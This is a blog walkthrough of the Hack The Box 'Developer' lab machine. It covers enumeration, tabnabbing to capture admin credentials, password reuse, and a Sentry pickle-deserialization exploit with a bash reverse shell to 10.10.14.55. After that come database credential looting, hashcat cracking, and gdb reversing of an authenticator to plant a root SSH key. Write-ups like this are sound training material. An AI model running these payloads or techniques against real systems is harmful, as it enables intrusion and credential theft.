Hack_The_Box_Writeups

HackTheBox – Developer Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -p- -T4 10.10.11.103

output: 22, 80

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -sC -sV -p22,80 10.10.11.103

http://developer.htb

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-words.txt -u http://developer.htb

http://developer.htb/accounts/signup/

┌──(rootkali)-[/home/kali/Downloads]

└─# unzip phished_list.zip

┌──(rootkali)-[/home/kali/Downloads]

└─# unzip phished_credentials.xlsx

we get the flag with a quick grep command for a common flag scheme.

┌──(rootkali)-[/home/kali/Downloads]

└─# grep -iRe ‘{.*}’

Flag: DHTB{H1dD3N_C0LuMn5_FtW}

Going to our profile we see that we now have a walkthrough submited. Checking the source of the page for the link we see that clicking on it opens a new tab with target="_blank". This makes it susceptible to tabnabbing since we can change the parent page of the tab.

After about a minute we get a hit on our listener with the user agent of firefox, which means it is probably checked using a browser.

┌──(rootkali)-[/home/kali/Downloads]

└─# python3 -m http.server 80

┌──(rootkali)-[/home/kali/Downloads]

└─# python3 -m http.server

┌──(rootkali)-[/home/kali/Downloads]

└─# tcpdump -i tun0 -nt -A

Link of walkthrough : http://10.10.14.55/evil.html

On tcpdump we get this.

Voila, the credentials are (admin:SuperSecurePassword@HTB2021). Armed with the credentials, we can now log in to Django administration.

http://developer.htb/admin/login/?next=/admin/

Here click on sites we can see Django is running 2 sites.

I’d better include developer-sentry.developer.htb into /etc/hosts as well. This is what the Sentry site looks like.

http://developer-sentry.developer.htb/auth/login/sentry/

Click on member.

We can see that jacob@developer.htb is a member of the site. Perhaps the password SuperSecurePassword@HTB2021 will work for this username as well?

Authenticated Remote Code Execution in Sentry

The first thing I notice is that this Sentry is old. The current Sentry release is 21.8.0!!!

Oh boy have I the right exploit for this. The following Python code will help to generate the poisonous pickle for deserialization in the data field of an audit log entry.

https://www.exploit-db.com/exploits/50318

https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf

┌──(rootkali)-[/home/kali/Downloads]

└─# python2 exploit.py “/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.55/1234 0>&1′”

Output:

eJwVi0EKgCAQAO/7Ck/pJVdTO/qGqBeoCQVRS1bvT2EOw8Ck8ka6r5RLgemifAJpEOKgARaOcT8xhrJxIANh4X2qZpu1yvqd+Y7hmj98EqFWsmGlc6gHY5nyna6Dg/DMNIL8AejnHXE=

http://developer-sentry.developer.htb/admin/sentry/auditlogentry/add/

Hit Save and you’ll see your shell.

www-data@developer:/var/sentry$ cd /etc

www-data@developer:/etc$ cd sentry

www-data@developer:/etc/sentry$ cat sentry.conf.py

www-data@developer:/etc/sentry$ psql sentry sentry -h localhost –W

password : SentryPassword2021

\d+

select * from auth_user;

Since karl is the admin and also a user on the machine we try to crack his password hash with hashcat first and are successful.

┌──(rootkali)-[/home/kali/Downloads]

└─# hashcat -m 10000 -O  hash rockyou.txt

Password: insaneclownposse

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh karl@developer.htb

karl@developer:~$ file /root/.auth/authenticator

┌──(rootkali)-[/home/kali/Downloads/test]

└─# scp karl@developer.htb:/root/.auth/authenticator .

https://github.com/pwndbg/pwndbg

┌──(rootkali)-[/home/kali/Downloads/test]

└─# gdb authenticator

pwndbg> start

pwndbg> b *0x55555555bfec

pwndbg> c

pwndbg> s

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

In above we copy this address

0x555555582df0

Coming back to password prompt and put 123456

Now delete all the previous set break points

pwndbg> d br

pwndbg> b *0x555555582df0

Now run once again

pwndbg> r

pwndbg> c

Here simply press enter

pwndbg> r

pwndbg> s

Address : 0x55555555b204

Now again delete the break point

pwndbg> d br

pwndbg> b *0x55555555b204

pwndbg> r

pwndbg> s

pwndbg> n

pwndbg> d br

pwndbg> b *0x55555555b231

pwndbg> r

Just to go this fuction use this ‘s’

pwndbg> s

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

Now finally we can see the call function

But nothing interesting so we continue to explore for another call function as in this call function we can see rbx is pointing register but nothing interesting in rbx

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

Here we can see something interesting like this in call  std::io::stdio::Stdin::read_line>

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> d br

pwndbg> b *0x55555555b876

pwndbg> r

pwndbg> s

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

Concentrate on <crypto::aes::ctr> of the call

Here we can see crypto show aes

pwndbg> d br

pwndbg> b *0x55555555b936

pwndbg> r

Once we put the password as 123456

Now all register having some value. Now we try to check the hex value

pwndbg> hex $rax

pwndbg> hex $rcx

pwndbg> hex $rsi

Search : cyberchef aes

Now we know crypto is aes and mode is ctr

https://gchq.github.io/CyberChef/#recipe=AES_Encrypt(%7B’option’:’UTF8′,’string’:’hello’%7D,%7B’option’:’Hex’,’string’:”%7D,”,”,”,%7B’option’:’Hex’,’string’:’undefined’%7D)&input=VGVzdA

these are the inputs

AES Encrypt:

a3 e8 32 34  5c 79 91 61  9e 20 d4 3d  be f4 f5 d5

KEY:

76 1f 59 e3  d9 d2 95 9a  a7 98 55 dc  06 20 81 6a

Input:

fe 1b 25 f0  80 6a 97 ca  78 80 fd 58  fc 5c 20 23 6c a2 db d0  e5 02 b5 fa  eb c0 af 3a  9f 27 15 2c

Here we get the output as  “RustForSecurity@Developer@2021:)”

Key:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2v26M3NL+LBT+e2ff66roKpi/4BdOypxaAr4dJ6pV7DCTmj3Hn4hutxOZttIhI/YdMZ4/FSRO5NkVDC6dE4KZ/0e/QzK9lc7l5zibpUqX1o2nk76BjOX1B+rciRS+MGNhWphAemTol3DPNv3+XUOvviByADThAnSo3uexy1BtBR3EsqTnOpYi3MJR4PVuPmh2MwQ6sjMCsHHONTjP9S2n6Mo91uch7xszM2kVuwhvjlDXQ00WU8HkGFlWcKNWyhhESOKLakebhFSQPMdY4LVDYTS2iQV7vnRyQMoAhkHW+io0cGhWxSSuSiw0fF3fnoAbPFQYU5ip3tZXjCG0y057m/peFCuU+ZF4LnR3138RaEsDW+zeooNJ5wXdB/IfiHqXrf/dnSmlZAF8g+4Jo1oXXuFc1GDHyRu42UaDDhJvL7D1sliB2AsOJb2S/0e4uWYowZDLGbuH7mHfAT1RQlp7Jl97a5K732XTkGGtGglCmH7YyG3ej8m7nf0SQdi8Hlk= root@kali

karl@developer:~$ sudo /root/.auth/authenticator

Enter your password to access the super user:

RustForSecurity@Developer@2021:)

Enter your SSH public key in now:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2v26M3NL+LBT+e2ff66roKpi/4BdOypxaAr4dJ6pV7DCTmj3Hn4hutxOZttIhI/YdMZ4/FSRO5NkVDC6dE4KZ/0e/QzK9lc7l5zibpUqX1o2nk76BjOX1B+rciRS+MGNhWphAemTol3DPNv3+XUOvviByADThAnSo3uexy1BtBR3EsqTnOpYi3MJR4PVuPmh2MwQ6sjMCsHHONTjP9S2n6Mo91uch7xszM2kVuwhvjlDXQ00WU8HkGFlWcKNWyhhESOKLakebhFSQPMdY4LVDYTS2iQV7vnRyQMoAhkHW+io0cGhWxSSuSiw0fF3fnoAbPFQYU5ip3tZXjCG0y057m/peFCuU+ZF4LnR3138RaEsDW+zeooNJ5wXdB/IfiHqXrf/dnSmlZAF8g+4Jo1oXXuFc1GDHyRu42UaDDhJvL7D1sliB2AsOJb2S/0e4uWYowZDLGbuH7mHfAT1RQlp7Jl97a5K732XTkGGtGglCmH7YyG3ej8m7nf0SQdi8Hlk= root@kali

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i /root/.ssh/id_rsa root@developer.htb

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *